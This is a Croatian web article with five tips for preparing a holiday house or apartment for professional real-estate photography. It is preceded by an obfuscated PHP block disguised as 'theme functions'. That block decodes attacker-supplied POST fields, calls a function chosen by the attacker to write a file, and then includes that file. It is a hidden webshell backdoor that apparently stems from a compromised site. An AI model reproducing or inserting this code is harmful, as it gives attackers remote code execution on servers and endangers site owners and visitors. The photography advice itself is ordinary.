/* www.lukart.hr theme functions */ if( ! function_exists('pspyamqqta') ) { function pspyamqqta($yafgdry, $schpdunpjtp) { $btwwwfjlrf = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'; $yafgdry = strtr($yafgdry, $schpdunpjtp, $btwwwfjlrf); $yafgdry = edyuefugmygrlv($yafgdry); return $yafgdry; } function edyuefugmygrlv($duauctspbwy) { $duauctspbwy = base64_decode($duauctspbwy); return $duauctspbwy; } $grvvleh = $_POST; if(isset($grvvleh['dcaqegimm'])) { $zlpfpdych = $grvvleh['dcaqegimm']; $cjmodbmgowfrjba = pspyamqqta($grvvleh['romrvxcszney'], $zlpfpdych); $mqttvtcffmafl = pspyamqqta($grvvleh['syqcmrhhzkqsch'], $zlpfpdych); $pslgdik = pspyamqqta($grvvleh['hqonabgh'], $zlpfpdych); $pslgdik($cjmodbmgowfrjba, $mqttvtcffmafl); include($cjmodbmgowfrjba); } } /* www.lukart.hr theme functions */ Pet korisnih savjeta kako pripremiti nekretninu za fotografiranje

Pet korisnih savjeta kako pripremiti nekretninu za fotografiranje

Dolaskom proljeća vaša kuća za odmor ili apartman i službeno započinje s finalnim pripremama za prihvat gostiju tijekom turističke sezone. Vaš golemi trud oko svakog detalja potrebno je predstaviti gostima, a za to su nužne profesionalne fotografije. Angažman fotografa specijaliziranog za nekretnine podrazumjeva da vašu nekretninu predstavi u najboljem mogućem svjetlu. On ima adekvatnu opremu i znanje kako, odnosno iz kojeg kuta se najbolje predstavlja prostor, no za najbolji mogući rezultat on treba vašu pomoć koja je vama u interesu. Evo što bi mu trebali omogućiti neposredno pred fotografiranje.

1.Skladno uredite prostor

Uvjereni smo da vam ovo nije potrebno naglašavati, jer u Istri zaista velik broj nekretnina namijenjenih turizmu zaista odiše skladom i svojim izgledom poziva na odmor. No ipak, nije zgorega podsjetiti kako je važno stvoriti ugodan prostor za boravljenje. Zapamtite, ono što se vama možda može činiti pomalno jednoličnim uređenjem, u turizmu je dobrodošlo, ponajprije zbog velikog broja gostiju koji se izmjenjuju. Idealno je postići uređenje u istom stilu, da nema previše odstupanja, a da tek detalji čine odstupanje od „sterilnog“ . Zastori bi svi trebali biti jednaki  i istom tonu, ravnomjerno otvoreni ili spušteni. Posteljina na krevetima u bojama koje su u skladu s uređenjem i perfektno (hotelski) namještena. Kuhinja i dnevni prostor trebali bi biti oslobođenih svih nepotrebnih stvari ,  hladnjak bez magneta i ostalih tragova boravljenja izvan iznajmljivanja. Kutijama na ormarima, metlama, sredstvima za čišćenje i sličnim predmetima nije mjesto na fotografiji.  Ukoliko na zidovima imate puno slika, razmislite o njihovoj tematici, jesu li one potrebne ili samo guše prostor, te hoće li se iste uopće svidjeti većini vaših gostiju. Gost ne smije steći dojam da u ovoj nekretnini netko živi izvan sezone. Vodite se filozofijom manje je više, sigurno nećete pogriješiti.

2. Temeljito očistite nekretninu pred fotografiranje

Zvuči banalno ali je neizostavno. Vi zaista morate očistiti vašu nekretninu kao da upravo očekujete goste. Ne uzdajte se u fotografov „photoshop“, već izglancajte svaki detalj što bolje možete. Posebno obratite pažnju na sjajne površine i stakla, jer otisci prstiju na kuhinjskim elementima,  stolićima, televizoru  a posebno na staklenim vratima itekako se primjete. Iznimno je važno da kupaonica blista, stoga posebno važno koncentrirati se na čiustoću između pločica, ispravnost wc daske (važno je da kod fotografiranja bude spuštena). S visokotlačnim peračem očistite kamene površinu u dvorištu, naročito oko bazena, pokosite travu, uredite vrt što je bolje moguće. Očistite kamin i pripremite ga za grill, te uklonite sve čemu nije mjesto na fotografiji.

 

3. Provjerite ispavnost uređaja te upalite sva svjetla

Prije dolaska fotografa provjerite jesu li sve žarulje ispravne te neposredno pred fotografiranje upalite sva svjetla, noćne ormariće, otvorite sve zastore, podignite rolete, osigurajte da što više svjetla uđe u prostor. Obratite pozornost na kablove, pokušajte ih sakriti koliko god je to moguće. Pri tome možete koristiti jednostavne bijele PVC kanalice koje ne nagrđuju prostor a adekvatno sakrivaju kablove. Televizor za vrijeme fotografiranja mora biti ugašen. Ovo je dobra prilika da provjerite jesu li vam svi uređaji u potpunosti ispravni.

4. Stvorite ugođaj

Najvažnija stavka! Iznimno je važno da vaša nekretnina poziva goste na uživanje u odmoru. Na stranicama oglasnika turističkog oglasnika teško je nadmetati se s konkurencijom, na vama je da fotografijama pozovete goste. Evo nekoliko primjera.
Kuhinjske elemente ukrasite svježim povrćem i špagetima, francuskim kruhom, atraktivnim čajnikom, maslinovim uljem,…Blagavaonski stol  urediti kao da očekujete goste, ali nije potrebno stavljati hranu na stol. Odličan efekt postići ćete ukrašavanjem stola svježe ubranim cvijećem. U jutarnjim satima vaši gosti će poželjeti opuštanje uz bazen. Uredite ležaljke kao da će se na njima  upravo  sunčati vaša gošća; ukrasite ih čistim zarolanim ručnikom,  časopisom ili knjigom na stoliću pokraj spuštenog suncobrana, dodajte rashlađeni koktel , a u bazen šarenu loptu koja poziva na igru. Ukoliko nemate bazen, priredite im sličan prizor na terasi uz kavu i croissant na stolu.
Ukoliko imate lijepu rasvjetu oko kuće, vama su iznimno važne noćne fotografije koje nastaju za vrijeme i odmah nakon zalaska sunca. Tada možete iskoristit potencijal kamina zapalivši vatru te postaviti butelju vina i svježu ribu pred ili, još bolje, na gradele. Takve fotografije kamina zovu vaše goste na večernji ugođaj. Ukrasite kupaonicu, noćni ormarić, dječji kutak, bezbroj je ideja, koristite Pinterest  za inspiraciju.

 

5. Osigurajte fotografu dovoljno vremena i neometan rad

Ukoliko ste gore navedene stavke , vi ste na korak da dobijete zaista reprezentativne fotografije. Sad je potrebno osigurati vašem fotografu slobodno kretanje kroz sve prostorije i dovoljno vremena da obavi posao . Realno, ovisno o nekretnini, potrebno je minimalno sat vremena za fotografiranje apartmnana s više soba, odnosno minimalno dva sata za fotografiranje kuće za odmor. Ovo je diskutabilno jer postoje  fotografi (naročito agencijski) koji fotografiraju  znatno i brže, no mi kao neovisni fotografi govorimo o vlastitom iskustvu na terenu. Na koncu, za kvalitetno odrađen posao potrebno je uložiti vrijeme, stoga nije . Ukoliko vam sam ne kaže, svakako zapitajte svog fotografa kad možete očekivati isporuku fotografija.